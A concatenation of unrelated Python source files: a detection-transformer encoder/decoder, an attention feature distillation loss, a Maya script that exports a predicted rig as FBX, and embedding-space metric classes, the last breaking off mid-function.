bs, c = memory.shape[:2]
# L, E
if not self.zero_tgt:
query_embed, tgt = torch.split(query_embed, c, dim=1)
query_embed = query_embed.unsqueeze(1).expand(-1, bs, -1)
tgt = tgt.unsqueeze(1).expand(-1, bs, -1)
else:
tgt = torch.zeros_like(query_embed)
query_embed = query_embed.unsqueeze(1).expand(-1, bs, -1)
pos_centers = self.sampling_cens(tgt)
# [#dec, #query, bs, dim] or [#query, bs, dim]
hs, inter_ps, dec_attns = self.decoder(tgt, memory, memory_key_padding_mask=mask_flatten,
pos=lvl_pos_embed_flatten, query_pos=query_embed,
pos_centers=pos_centers, spatial_shape=spatial_shapes,
)
if self.return_intermediate_dec:
return hs.transpose(1, 2), memory, inter_ps.transpose(1, 2), dec_attns
else:
return hs.transpose(0, 1), memory, inter_ps.transpose(0, 1), dec_attns
class TransformerEncoder(nn.Module):
def __init__(self, encoder_layer, num_layers):
super().__init__()
self.layers = _get_clones(encoder_layer, num_layers)
self.num_layers = num_layers
def forward(self, src, src_key_padding_mask, pos, spatial_shape):
output = src
for layer in self.layers:
output = layer(output, src_key_padding_mask=src_key_padding_mask, pos=pos, spatial_shape=spatial_shape)
return output
class TransformerDecoder(nn.Module):
def __init__(self, decoder_layer, num_layers, dense_query, norm=None, return_intermediate=False):
super().__init__()
self.layers = _get_clones(decoder_layer, num_layers)
self.num_layers = num_layers
self.norm = norm
self.return_intermediate = return_intermediate
self.bbox_embed = None
self.dense_query = dense_query
def forward(self, tgt, memory,
tgt_mask: Optional[Tensor] = None,
memory_mask: Optional[Tensor] = None,
tgt_key_padding_mask: Optional[Tensor] = None,
memory_key_padding_mask: Optional[Tensor] = None,
pos: Optional[Tensor] = None,
query_pos: Optional[Tensor] = None,
pos_centers=None, spatial_shape=None):
output = tgt
intermediate = []
intermediate_centers = []
intermediate_dec_attns = []
# intermediate_tgt = []
for lvl, layer in enumerate(self.layers):
# intermediate_tgt.append(output)
if self.dense_query is True: # work around for dense query implementation
outputs_coord = pos_centers.permute(1, 0, 2).sigmoid()
nquery = outputs_coord.size(1)
tgt_masks = []
for pred in outputs_coord:
tgt_masks_ = torch.zeros((nquery, nquery), device=pos_centers.device)
boxes = box_cxcywh_to_xyxy(pred)
giou_score = 1 - generalized_box_iou( boxes, boxes)
score = giou_score
top_idx = torch.sort(score, dim=-1)[1][:, :100] # returns a longtensor
# _, top_idx = torch.topk(score, k=100, largest=False, sorted=True,dim=-1)#[nquery, topk] #torch.sort is faster on GPU
tgt_masks_.scatter_(1, top_idx, 1.)
tgt_masks.append(tgt_masks_)
tgt_mask = torch.stack(tgt_masks, dim=0).repeat_interleave(8, 0)
output, dec_attn = layer(output, memory, tgt_mask=tgt_mask,
memory_mask=memory_mask,
tgt_key_padding_mask=tgt_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask,
pos=pos, query_pos=query_pos,
pos_centers=pos_centers,
spatial_shape=spatial_shape)
if self.return_intermediate:
intermediate.append(self.norm(output))
intermediate_centers.append(pos_centers)
intermediate_dec_attns.append(dec_attn)
if self.bbox_embed is not None:
tmp = self.bbox_embed[lvl](self.norm(output))
new_pos_centers = tmp + pos_centers
pos_centers = new_pos_centers.detach()
if self.norm is not None:
output = self.norm(output)
if self.return_intermediate:
intermediate.pop()
intermediate.append(output)
if self.return_intermediate:
return torch.stack(intermediate), torch.stack(intermediate_centers), torch.stack(intermediate_dec_attns)#torch.stack(intermediate_tgt)
return output, pos_centers, dec_attn
class TransformerEncoderLayer(nn.Module):
def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,
activation="relu", enc_sampling_points=1, checkpoint_ffn=False,
num_feature_levels=4):
super().__init__()
self.self_attn = SamplingEncAttention(d_model, dec_sampling_heads=nhead, dec_sampling_points=enc_sampling_points, feature_levels=num_feature_levels)
self.linear1 = nn.Linear(d_model, dim_feedforward)
self.linear2 = nn.Linear(dim_feedforward, d_model)
self.norm1 = nn.LayerNorm(d_model)
self.norm2 = nn.LayerNorm(d_model)
self.dropout = nn.Dropout(dropout)
self.dropout1 = nn.Dropout(dropout)
self.dropout2 = nn.Dropout(dropout)
self.activation = _get_activation_fn(activation)
self.checkpoint_ffn = checkpoint_ffn
def with_pos_embed(self, tensor, pos: Optional[Tensor]):
return tensor if pos is None else tensor + pos
def forward(self, src, src_key_padding_mask, pos, spatial_shape):
src2 = self.self_attn(src, pos=pos, key_padding_mask=src_key_padding_mask, spatial_shape=spatial_shape)
src = src + self.dropout1(src2)
def wrap1(src):
N_, C_, S_ = src.shape
src = src.permute(2, 0, 1)
src = self.norm1(src)
src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))
src = src + self.dropout2(src2)
src = self.norm2(src)
src = src.view(S_, N_, C_).permute(1, 2, 0)
return src
if self.checkpoint_ffn and self.train() == True:
#does not store intermediate activation and instead recompute then in backward pass, trades computatin for memory
src = torch.utils.checkpoint.checkpoint(wrap1, src)
else:
src = wrap1(src)
return src
class TransformerDecoderLayer(nn.Module):
def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,
activation="relu", dec_sampling_points=8, num_feature_levels=4, checkpoint_ffn=False,
rectified_attention=False
):
super().__init__()
self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)
# self.self_attn = MultiHeadAttention(d_model, nhead, dropout)
if rectified_attention:
self.multihead_attn = SamplingAttention_RA(d_model, dec_sampling_points=dec_sampling_points,
num_feature_levels=num_feature_levels)
else:
self.multihead_attn = SamplingAttention_dec(d_model, dec_sampling_points=dec_sampling_points,
num_feature_levels=num_feature_levels)
self.linear1 = nn.Linear(d_model, dim_feedforward)
self.dropout = nn.Dropout(dropout)
self.linear2 = nn.Linear(dim_feedforward, d_model)
self.norm1 = nn.LayerNorm(d_model)
self.norm2 = nn.LayerNorm(d_model)
self.norm3 = nn.LayerNorm(d_model)
self.dropout1 = nn.Dropout(dropout)
self.dropout2 = nn.Dropout(dropout)
self.dropout3 = nn.Dropout(dropout)
self.activation = _get_activation_fn(activation)
self.checkpoint_ffn = checkpoint_ffn
def with_pos_embed(self, tensor, pos: Optional[Tensor]):
return tensor if pos is None else tensor + pos
def forward(self, tgt, memory,
tgt_mask: Optional[Tensor] = None,
memory_mask: Optional[Tensor] = None,
tgt_key_padding_mask: Optional[Tensor] = None,
memory_key_padding_mask: Optional[Tensor] = None,
pos: Optional[Tensor] = None,
query_pos: Optional[Tensor] = None,
pos_centers=None, spatial_shape=None):
q = k = self.with_pos_embed(tgt, query_pos)
tgt2 = self.self_attn(q, k, tgt, attn_mask=tgt_mask, key_padding_mask=tgt_key_padding_mask)[0]
# tgt2 = self.self_attn(q, k, tgt, attn_mask=tgt_mask, mask=tgt_key_padding_mask)[0]
tgt = tgt + self.dropout1(tgt2)
tgt = self.norm1(tgt)
tgt2, dec_attn = self.multihead_attn(tgt, query_pos,
memory, pos,
key_padding_mask=memory_key_padding_mask,
pos_centers=pos_centers, spatial_shape=spatial_shape)
tgt = tgt + self.dropout2(tgt2)
def wrap2(tgt):
tgt = self.norm2(tgt)
tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))
tgt = tgt + self.dropout3(tgt2)
tgt = self.norm3(tgt)
return tgt
if self.checkpoint_ffn and self.train() == True:
tgt = torch.utils.checkpoint.checkpoint(wrap2, tgt)
else:
tgt = wrap2(tgt)
return tgt, dec_attn
def build_transformer(cfg):
return Transformer(cfg)
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
'''
In the original paper, AFD is one of components of AFDS.
AFDS: Attention Feature Distillation and Selection
AFD: Attention Feature Distillation
AFS: Attention Feature Selection
We find the original implementation of attention is unstable, thus we replace it with a SE block.
'''
class AFD(nn.Module):
'''
Pay Attention to Features, Transfer Learn Faster CNNs
https://openreview.net/pdf?id=ryxyCeHtPB
'''
def __init__(self, in_channels, att_f):
super(AFD, self).__init__()
mid_channels = int(in_channels * att_f)
self.attention = nn.Sequential(*[
nn.Conv2d(in_channels, mid_channels, 1, 1, 0, bias=True),
nn.ReLU(inplace=True),
nn.Conv2d(mid_channels, in_channels, 1, 1, 0, bias=True)
])
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
def forward(self, fm_s, fm_t, eps=1e-6):
fm_t_pooled = F.adaptive_avg_pool2d(fm_t, 1)
rho = self.attention(fm_t_pooled)
# rho = F.softmax(rho.squeeze(), dim=-1)
rho = torch.sigmoid(rho.squeeze())
rho = rho / torch.sum(rho, dim=1, keepdim=True)
fm_s_norm = torch.norm(fm_s, dim=(2,3), keepdim=True)
fm_s = torch.div(fm_s, fm_s_norm+eps)
fm_t_norm = torch.norm(fm_t, dim=(2,3), keepdim=True)
fm_t = torch.div(fm_t, fm_t_norm+eps)
loss = rho * torch.pow(fm_s-fm_t, 2).mean(dim=(2,3))
loss = loss.sum(1).mean(0)
return loss
# class AFD(nn.Module):
# '''
# Pay Attention to Features, Transfer Learn Faster CNNs
# https://openreview.net/pdf?id=ryxyCeHtPB
# '''
# def __init__(self, chw):
# super(AFD, self).__init__()
# c, h, w = chw
# self.weight1 = nn.Parameter(math.sqrt(2.0) / math.sqrt(h*w) * torch.randn(h, h*w))
# self.bias1 = nn.Parameter(torch.zeros(h))
# self.weight2 = nn.Parameter(math.sqrt(2.0) / math.sqrt(h) * torch.randn(h))
# self.bias2 = nn.Parameter(torch.zeros(c))
# def forward(self, fm_s, fm_t, eps=1e-6):
# b, c, h, w = fm_t.size()
# fm_t_flatten = fm_t.view(fm_t.size(0), fm_t.size(1), -1)
# weight1 = torch.stack([self.weight1.t()]*b, dim=0)
# bias1 = self.bias1.unsqueeze(0).unsqueeze(1)
# rho = F.relu(torch.bmm(fm_t_flatten, weight1) + bias1)
# weight2 = self.weight2.view(-1, 1)
# bias2 = self.bias2.unsqueeze(0)
# rho = torch.mm(rho.view(-1, rho.size(2)), weight2).view(b,c) + bias2
# # rho = F.softmax(rho, dim=-1)
# rho = torch.sigmoid(rho)
# rho = rho / torch.sum(rho, dim=1, keepdim=True)
# # print(rho)
# fm_s_norm = torch.norm(fm_s, dim=(2,3), keepdim=True)
# fm_s = torch.div(fm_s, fm_s_norm+eps)
# fm_t_norm = torch.norm(fm_t, dim=(2,3), keepdim=True)
# fm_t = torch.div(fm_t, fm_t_norm+eps)
# loss = rho * torch.pow(fm_s-fm_t, 2).mean(dim=(2,3))
# loss = loss.sum(1).mean(0)
# return loss |
#-------------------------------------------------------------------------------
# Name: maya_save_fbx.py
# Purpose: run this scriptin maya. Assemble predicted rig (.txt) and obj
# mesh together to a FBX file
# RigNet Copyright 2020 University of Massachusetts
# RigNet is made available under General Public License Version 3 (GPLv3), or under a Commercial License.
# Please see the LICENSE README.txt file in the main directory for more information and instruction on using and licensing RigNet.
#-------------------------------------------------------------------------------
import maya
import maya.standalone
maya.standalone.initialize(name='python')
import maya.OpenMaya as om
import maya.cmds as cmds
import maya.mel as mel
import numpy as np
import pymel.core as pm
import os
import glob
def loadInfo(info_name, geo_name):
f_info = open(info_name,'r')
joint_pos = {}
joint_hier = {}
joint_skin = []
for line in f_info:
word = line.split()
if word[0] == 'joints':
joint_pos[word[1]] = [float(word[2]), float(word[3]), float(word[4])]
if word[0] == 'root':
root_pos = joint_pos[word[1]]
root_name = word[1]
cmds.joint(p=(root_pos[0], root_pos[1],root_pos[2]), name = root_name)
if word[0] == 'hier':
if word[1] not in joint_hier.keys():
joint_hier[word[1]] = [word[2]]
else:
joint_hier[word[1]].append(word[2])
if word[0] == 'skin':
skin_item = word[1:]
joint_skin.append(skin_item)
f_info.close()
this_level = [root_name]
while this_level:
next_level = []
for p_node in this_level:
if p_node in joint_hier.keys():
for c_node in joint_hier[p_node]:
cmds.select(p_node, r=True)
child_pos = joint_pos[c_node]
cmds.joint(p=(child_pos[0], child_pos[1],child_pos[2]), name = c_node)
next_level.append(c_node)
this_level = next_level
cmds.joint(root_name, e=True, oj='xyz', sao='yup', ch=True, zso=True)
cmds.skinCluster( root_name, geo_name)
#print len(joint_skin)
for i in range(len(joint_skin)):
vtx_name = geo_name + '.vtx['+joint_skin[i][0]+']'
transValue = []
for j in range(1,len(joint_skin[i]),2):
transValue_item = (joint_skin[i][j], float(joint_skin[i][j+1]))
transValue.append(transValue_item)
#print vtx_name, transValue
cmds.skinPercent( 'skinCluster1', vtx_name, transformValue=transValue)
cmds.skinPercent( 'skinCluster1', geo_name, pruneWeights=0.01, normalize=False )
return root_name, joint_pos
def getGeometryGroups():
geo_list = []
geometries = cmds.ls(type='surfaceShape')
for geo in geometries:
if 'ShapeOrig' in geo:
'''
we can also use cmds.ls(geo, l=True)[0].split("|")[0]
to get the upper level node name, but stick on this way for now
'''
geo_name = geo.replace('ShapeOrig', '')
geo_list.append(geo_name)
if not geo_list:
geo_list = cmds.ls(type='surfaceShape')
return geo_list
if __name__ == '__main__':
#model_id = "17872"
# model_id = "smith"
# print model_id
# info_name = "/home/junjie/workspace/RigNet/quick_start/11814_ori_rig.txt"
# obj_name = info_name.replace("_ori_rig.txt", "_ori.obj").replace(".txt", ".obj").replace("rig_info_remesh", "obj_remesh").replace("rig_info", "obj")
# out_name = os.path.basename(info_name).replace("_ori", "_gen").replace(".txt", ".fbx")
# print(info_name, obj_name)
# print(out_name)
import sys
info_name = sys.argv[1]
obj_name = info_name.replace(".txt", ".obj")
out_name = info_name.replace(".txt", ".fbx")
# info_name = "Ch14_nonPBR.txt"
# obj_name = "Ch14_nonPBR.obj"
# out_name = obj_name.split('.')[0] + "_out.fbx"
# obj_name = ""
# obj_name = 'D:\\{:s}_ori.obj'.format(model_id)
# info_name = 'D:\\{:s}_ori_rig.txt'.format(model_id)
# out_name = 'D:\\{:s}.fbx'.format(model_id)
# import obj
cmds.file(new=True,force=True)
cmds.file(obj_name, o=True)
# import info
geo_list = getGeometryGroups()
root_name, _ = loadInfo(info_name, geo_list[0])
# export fbx
pm.mel.FBXExport(f=out_name)
|
<gh_stars>1-10
import torch
from pytorch_lightning.metrics import Metric
from torch.nn import functional as F
from analysis.downstream_embeddings import LocalScanDownstreamEmbeddings
from models.pretraining.pretraining_utils import EmbeddingsData
def compute_std_from_sample_vars(sample_means, sample_vars):
return torch.sqrt(sample_vars.mean() + sample_means.var()) \
if sample_means.shape[0] > 1 else torch.sqrt(sample_vars.mean())
def compute_avg_dist_to_mean(values):
"""
:param values: (B x d)
:return:
"""
mean = values.mean(dim=0, keepdim=True)
return F.pairwise_distance(values, mean, p=2).mean()
class GlobalEmbeddingSpaceMetrics:
"""
-- across sample diversity --
-> ch_std
-> dist_emb2emb (dist_emb2emb__batch_estimate)
"""
def __init__(self, prefix, compute_cov=False):
self.compute_cov = compute_cov
self.prefix = prefix + '/'
self.embeddings = [] # (B x d)
self.emb2emb_dists__batch_estimate = [] # (1)
self.uniformity = [] # (1)
def compute(self, compute_dist_emb2emb=False):
if len(self.embeddings) == 0:
return {}
embeddings = torch.cat(self.embeddings, dim=0) # (B_total x d)
emb2emb_dists__batch_estimate = torch.stack(self.emb2emb_dists__batch_estimate, dim=0) # (N_batch)
uniformity = torch.stack(self.uniformity, dim=0) # (N_batch)
metrics = {
self.prefix + "ch_std": embeddings.std(dim=0).mean(),
self.prefix + "uniformity": uniformity.mean().log(), # see https://arxiv.org/pdf/2005.10242.pdf / https://arxiv.org/pdf/2105.00470.pdf
self.prefix + "dist_emb2emb__batch_estimate": emb2emb_dists__batch_estimate.mean() # emb_avg_batch_centroid_dist
}
if compute_dist_emb2emb:
cdist = torch.cdist(embeddings.unsqueeze(0), embeddings.unsqueeze(0), p=2).squeeze(0) # (B_total x B_total)
metrics[self.prefix + "dist_emb2emb"] = cdist.mean()
if self.compute_cov:
B, d = embeddings.size()
diag = torch.eye(d, device=embeddings.device).bool()
cov = embeddings - embeddings.mean(dim=0, keepdim=True) # (B x d)
cov = (cov.T @ cov) / (B - 1) # (d x d)
metrics[self.prefix + "cov_offdiagonal"] = cov[~diag].pow_(2).sum() / d
return metrics
def update(self, embeddings):
"""
:param embeddings: B x d
:return:
"""
if embeddings is None:
return
self.embeddings.append(embeddings)
# ----- avg pairwise distances btw. per-sample centroids (centroid_sample2sample_dist) -----
cdist = torch.cdist(embeddings.unsqueeze(0), embeddings.unsqueeze(0), p=2).squeeze(0) # (B x B)
self.emb2emb_dists__batch_estimate.append(cdist.mean())
self.uniformity.append(torch.exp(-2 * (cdist ** 2)).mean()) # (1)
class LocalEmbeddingSpaceMetrics:
"""
Note: __std means the std of that value btw. different samples, the value itself is then the mean of different samples
-- within sample diversity --
-> ch_std_per_sample (+ ch_std_per_sample__std)
-> dist_emb2cent (+ dist_emb2cent_dist__std)
-> dist_emb2emb (+ dist_emb2emb__weighted)
-- across sample diversity --
-> ch_std
-> ch_std_sample_centroids
-> dist_cent2cent (dist_cent2cent__batch_estimate)
"""
def __init__(self, prefix, compute_cov=False):
self.compute_cov = compute_cov
self.prefix = prefix + '/'
self.means = [] # (B x d)
self.vars = [] # (B x d)
self.cov_offdiagonal_per_sample = [] # (B)
self.cov_offdiagonal = [] # (1)
self.per_sample_uniformity = [] # (B)
self.emb2cent_dists__means = [] # (1)
self.emb2cent_dists__vars = [] # (1)
self.emb2emb_dists = [] # (1)
self.emb2emb_dists_weighted = [] # (1)
self.cent2cent_dists__batch_estimate = [] # (1)
def compute(self, compute_dist_cent2cent=False):
if len(self.means) == 0:
return {}
means = torch.cat(self.means, dim=0) # (B_total x d)
vars = torch.cat(self.vars, dim=0) # (B_total x d)
emb2cent_dists__means = torch.stack(self.emb2cent_dists__means, dim=0) # (N_batch)
emb2cent_dists__vars = torch.stack(self.emb2cent_dists__vars, dim=0) # (N_batch)
emb2emb_dists = torch.stack(self.emb2emb_dists, dim=0) # (N_batch)
cent2cent_dists__batch_estimate = torch.stack(self.cent2cent_dists__batch_estimate, dim=0) # N_batch
per_sample_uniformity = torch.cat(self.per_sample_uniformity, dim=0) # B_total
var_sample_centroids = means.var(dim=0) if means.shape[0] > 1 else 0. # (d)
ch_std_per_sample = torch.sqrt(vars).mean(1) # (B_total)
metrics = {
self.prefix + "ch_std": torch.sqrt(var_sample_centroids + vars.mean(dim=0)).mean(), # total_std
self.prefix + "ch_std_per_sample": ch_std_per_sample.mean(), # per_sample_std
self.prefix + "ch_std_per_sample__std": ch_std_per_sample.std(),
self.prefix + "ch_std_sample_centroids": torch.sqrt(var_sample_centroids).mean(), # sample_means_std,
self.prefix + "per_sample_uniformity": per_sample_uniformity.mean(),
self.prefix + "per_sample_uniformity__std": per_sample_uniformity.std(),
self.prefix + "dist_emb2cent": emb2cent_dists__means.mean(), # emb_avg_centroid_dist
self.prefix + "dist_emb2cent__std": compute_std_from_sample_vars(emb2cent_dists__means, emb2cent_dists__vars),
self.prefix + "dist_emb2emb": emb2emb_dists.mean(), # emb_avg_dist,
self.prefix + "dist_cent2cent__batch_estimate": cent2cent_dists__batch_estimate.mean(), # emb_avg_batch_centroid_dist
self.prefix + "dist_cent2dataset": compute_avg_dist_to_mean(means) # centroid_sample2dataset_dist
}
if compute_dist_cent2cent:
mean_cdist = torch.cdist(means.unsqueeze(0), means.unsqueeze(0), p=2).squeeze(0) # (B_total x B_total)
metrics[self.prefix + "dist_cent2cent"] = mean_cdist.mean()
if self.compute_cov:
cov_offdiagonal_per_sample = torch.cat(self.cov_offdiagonal_per_sample, dim=0) # (B_total)
cov_offdiagonal = torch.stack(self.cov_offdiagonal, dim=0) # (num_batche)
B, d = means.size()
diag = torch.eye(d, device=means.device).bool()
cov_of_centroids = means - means.mean(dim=0, keepdim=True) # (B x d)
cov_of_centroids = (cov_of_centroids.T @ cov_of_centroids) / (B - 1) # (d x d)
metrics[self.prefix + "cov_offdiagonal__batch_estimate"] = cov_offdiagonal.mean()
metrics[self.prefix + "cov_offdiagonal_per_sample"] = cov_offdiagonal_per_sample.mean()
metrics[self.prefix + "cov_offdiagonal_per_sample__std"] = cov_offdiagonal_per_sample.std()
metrics[self.prefix + "cov_offdiagonal_sample_centroids"] = cov_of_centroids[~diag].pow_(2).sum() / d
if len(self.emb2emb_dists_weighted) > 0:
emb2emb_dists_weighted = torch.stack(self.emb2emb_dists_weighted, dim=0) # (N_batch)
metrics[self.prefix + "dist_emb2emb__weighted"] = emb2emb_dists_weighted.mean() # emb_weighted_avg_dist
return metrics
def update(self, embeddings, mask, weights=None):
"""
:param embeddings: B x N x d
:param mask: B x N
:return:
"""
if embeddings is None:
return None
B, N, d = embeddings.size()
N_local = mask.float().sum(dim=1) # (B)
avg_correction_factor = N_local / N # (B)
# ----- per-channel mean, variance, and covariance of embeddings (respect masks)-----
mean = (mask[:, :, None] * embeddings).mean(dim=1) / avg_correction_factor[:, None] # (B x d)
expanded_means = mean.unsqueeze(1).expand(B, N, d) # (B x N x d)
var_embeddings = embeddings.clone()
var_embeddings[~mask] = expanded_means[~mask]
avg_correction_factor_var = (mask.float().sum(dim=1) - 1) / (N - 1) # (B)
var = var_embeddings.new_zeros(B, d)
var_samples_mask = N_local > 1 # (B)
var[var_samples_mask] = var_embeddings[var_samples_mask].var(dim=1) / avg_correction_factor_var[var_samples_mask, None] # (B x d)
if self.compute_cov:
embeddings_for_cov = embeddings - expanded_means # (B x N x d)
# set to zero to ignore
embeddings_for_cov[~mask, :] = 0.
# per-sample cov
cov = torch.bmm(embeddings_for_cov.transpose(-1, -2), embeddings_for_cov) / (N_local[:, None, None] - 1) # (B x d x d)
# set cov of samples with single local embeddings to 0
cov[mask.sum(-1) <= 1] = 0.
cov_of_centroids = mean - mean.mean(dim=0, keepdim=True) # (B x d)
cov_of_centroids = (cov_of_centroids.T @ cov_of_centroids) / (B - 1) # (d x d)
cov_total = torch.mean(cov, dim=0) + cov_of_centroids # (d x d)
B, d, _ = cov.size()
diag = torch.eye(d, device=cov.device).bool()
self.cov_offdiagonal_per_sample.append((cov[:, ~diag].pow_(2).sum(-1) / d)) # (B)
self.cov_offdiagonal.append((cov_total[~diag].pow_(2).sum() / d)) # (1)
self.means.append(mean)
self.vars.append(var)
# ----- avg distances of embeddings to per-sample centroids (emb2cent) -----
# (B x N)
pdists = F.pairwise_distance(embeddings.reshape(B * N, d), expanded_means.reshape(B * N, d), p=2).view(B, N)
avg_dist_to_mean = (mask * pdists).mean(dim=1) / avg_correction_factor # (B)
self.emb2cent_dists__means.append(avg_dist_to_mean.mean())
self.emb2cent_dists__vars.append(avg_dist_to_mean.var())
del pdists
# ----- avg pairwise distances btw. embeddings (emb2emb) -----
cdist = torch.cdist(embeddings, embeddings) # (B x N x N)
cdist = cdist * mask[:, :, None] * mask[:, None, :]
self.emb2emb_dists.append((
(cdist.mean(dim=2) / avg_correction_factor[:, None]).mean(dim=1) / avg_correction_factor).mean())
if weights is not None:
weighted_cdist = (weights[:, None, :] * cdist).sum(dim=2) # (B x N)
self.emb2emb_dists_weighted.append((weights * weighted_cdist).sum(dim=1).mean())
uniformity = torch.exp(-2 * (cdist ** 2)) * mask[:, :, None] * mask[:, None, :] # (B x N x N)
# (B)
uniformity = (uniformity.mean(2) / avg_correction_factor[:, None]).mean(dim=1) / avg_correction_factor
self.per_sample_uniformity.append(uniformity.log())
del cdist
# ----- avg pairwise distances btw. per-sample centroids (centroid_sample2sample_dist) -----
mean_cdist = torch.cdist(mean.unsqueeze(0), mean.unsqueeze(0), p=2).squeeze(0) # (B x B)
self.cent2cent_dists__batch_estimate.append(mean_cdist.mean())
return mean
class GlobalEmbeddingPairMetrics:
"""
- rmse
- dist (dist__std) -> avg (normalized) l2 distance
"""
def __init__(self, prefix):
self.prefix = prefix + '/'
self.batch_mse = [] # (1)
self.dists__means = [] # (1)
self.dists__vars = [] # (1)
def compute(self):
if len(self.batch_mse) == 0:
return {}
batch_mse = torch.stack(self.batch_mse, dim=0) # (N_batch)
dists__means = torch.stack(self.dists__means, dim=0) # (N_batch)
dists__vars = torch.stack(self.dists__vars, dim=0) # (N_batch)
return {
self.prefix + "rmse": torch.sqrt(batch_mse.mean()),
self.prefix + "dist": dists__means.mean(),
self.prefix + "dist__std": compute_std_from_sample_vars(dists__means, dists__vars)
}
def update(self, embeddings_1, embeddings_2):
"""
:param embeddings_1: (B x d)
:param embeddings_2: (B x d)
:return:
"""
if embeddings_1 is None or embeddings_2 is None:
return
# -- MSE --
mse = F.mse_loss(embeddings_1, embeddings_2, reduction='none').sum(-1) # (B)
self.batch_mse.append(mse.mean()) # (1)
dists = torch.sqrt(mse) # (B)
self.dists__means.append(dists.mean())
self.dists__vars.append(dists.var())
class LocalEmbeddingPairMetrics:
"""
avg per-sample distances
- sample_rmse (sample_rmse__std, sample_rmse__weighted)
- sample_min_dist, sample_max_dist, sample_std_dist
"""
def __init__(self, prefix):
self.prefix = prefix + '/'
self.sample_rmse__means = [] # (1)
self.sample_rmse__vars = [] # (1)
self.sample_rmse__weighted = [] # (1)
self.sample_min_dist = [] # (1)
self.sample_max_dist = [] # (1)
self.sample_std_dist = [] # (1)
def compute(self):
if len(self.sample_rmse__means) == 0:
return {}
sample_rmse__means = torch.stack(self.sample_rmse__means, dim=0) # (N_batch)
sample_rmse__vars = torch.stack(self.sample_rmse__vars, dim=0) # (N_batch)
sample_min_dist = torch.stack(self.sample_min_dist, dim=0) # (N_batch)
sample_max_dist = torch.stack(self.sample_max_dist, dim=0) # (N_batch)
sample_std_dist = torch.stack(self.sample_std_dist, dim=0) # (N_batch)
metrics = {
self.prefix + "sample_rmse": sample_rmse__means.mean(), # l2att_emb_mse
self.prefix + "sample_rmse__std": compute_std_from_sample_vars(sample_rmse__means, sample_rmse__vars),
self.prefix + "sample_min_dist": sample_min_dist.mean(), # l2att_emb_min_dist
self.prefix + "sample_max_dist": sample_max_dist.mean(), # l2att_emb_max_dist
self.prefix + "sample_std_dist": sample_std_dist.mean(), # l2att_emb_std_dist
}
if len(self.sample_rmse__weighted) > 0:
sample_rmse__weighted = torch.stack(self.sample_rmse__weighted, dim=0) # (N_batch)
metrics[self.prefix + "sample_rmse__weighted"] = sample_rmse__weighted.mean() # l2att_emb_weighted_mse
return metrics
def update(self, embeddings_1, embeddings_2, mask, weights=None):
"""
:param embeddings_1: (B x N x d)
:param embeddings_2: (B x N x d)
:param mask:
:return:
"""
if embeddings_1 is None or embeddings_2 is None:
return
B, N, d = embeddings_1.size()
# correction factor (due to mask) when taking the mean over N dimension
avg_correction_factor = mask.float().sum(dim=1) / N # (B)
# -- RMSE --
mse = F.mse_loss(embeddings_1, embeddings_2, reduction='none').sum(-1) * mask # (B x N)
rmse = torch.sqrt(mse.mean(dim=1) / avg_correction_factor) # (B)
if weights is not None:
weighted_rmse = torch.sqrt((weights * mse).sum(dim=1)) # (B)
self.sample_rmse__means.append(rmse.mean())
self.sample_rmse__vars.append(rmse.var())
if weights is not None:
self.sample_rmse__weighted.append(weighted_rmse.mean())
# -- min/max/std RMSE --
dists = torch.sqrt(mse) # (B x N)
dists_for_min = dists.clone() # (B x N)
dists_for_min[~mask] = float('inf')
self.sample_min_dist.append(dists_for_min.min(dim=1)[0].mean())
self.sample_max_dist.append(dists.max(dim=1)[0].mean())
self.sample_std_dist.append(torch.sqrt(dists.var(dim=1) / avg_correction_factor).mean())
class LocalDistributionPairMetrics:
"""
Note: ab_emb_centroid_dist computed on distribution avg with GlobalEmbeddingPair
- dist_emb2emb (dist_emb2emb__weighted)
- 1NN_emb2emb_2to1, 1NN_emb2emb_1to2
- assignment_2to2, assignment_1to1 => 1 = assigned to same modality, 0 = assigned to other modality, 0.5 = perfect alignment of modalities
"""
def __init__(self, prefix):
self.prefix = prefix + '/'
self.emb2emb_dists = [] # (1)
self.emb2emb_dists__weighted = [] # (1)
self.emb2emb_1NN_2to1 = [] # (1)
self.emb2emb_1NN_1to2 = [] # (1) a2b_emb_avg_1NN_dist
self.assignment_2to2 = [] # (1)
self.assignment_1to1 = [] # (1)
def compute(self):
if len(self.emb2emb_dists) == 0:
return {}
emb2emb_dists = torch.stack(self.emb2emb_dists, dim=0) # (N_batch)
emb2emb_1NN_2to1 = torch.stack(self.emb2emb_1NN_2to1, dim=0) # (N_batch)
emb2emb_1NN_1to2 = torch.stack(self.emb2emb_1NN_1to2, dim=0) # (N_batch)
assignment_2to2 = torch.stack(self.assignment_2to2, dim=0) # (N_batch)
assignment_1to1 = torch.stack(self.assignment_1to1, dim=0) # (N_batch)
metrics = {
self.prefix + "dist_emb2emb": emb2emb_dists.mean(), # ab_emb_avg_dist
self.prefix + "1NN_emb2emb_2to1": emb2emb_1NN_2to1.mean(), # b2a_emb_avg_1NN_dist
self.prefix + "1NN_emb2emb_1to2": emb2emb_1NN_1to2.mean(), # a2b_emb_avg_1NN_dist
self.prefix + "assignment_2to2": assignment_2to2.mean(),
self.prefix + "assignment_1to1": assignment_1to1.mean()
}
if len(self.emb2emb_dists__weighted) > 0:
emb2emb_dists__weighted = torch.stack(self.emb2emb_dists__weighted, dim=0) # (N_batch)
metrics[self.prefix + "dist_emb2emb__weighted"] = emb2emb_dists__weighted.mean() # ab_emb_weighted_avg_dist
return metrics
def update(self,
embeddings_1, embeddings_2,
mean_1, mean_2,
mask_1=None, mask_2=None,
weights_1=None, weights_2=None):
if embeddings_1 is None or embeddings_2 is None:
return
B, N_1, d = embeddings_1.size()
_, N_2, _ = embeddings_2.size()
# correction factor (due to mask) when taking the mean over N dimension
avg_correction_factor_1 = mask_1.float().sum(dim=1) / N_1 # (B)
avg_correction_factor_2 = mask_2.float().sum(dim=1) / N_2 # (B)
# ----- avg pairwise distance btw embeddings ----
cdist = torch.cdist(embeddings_1, embeddings_2) # (B x N_1 x N_2)
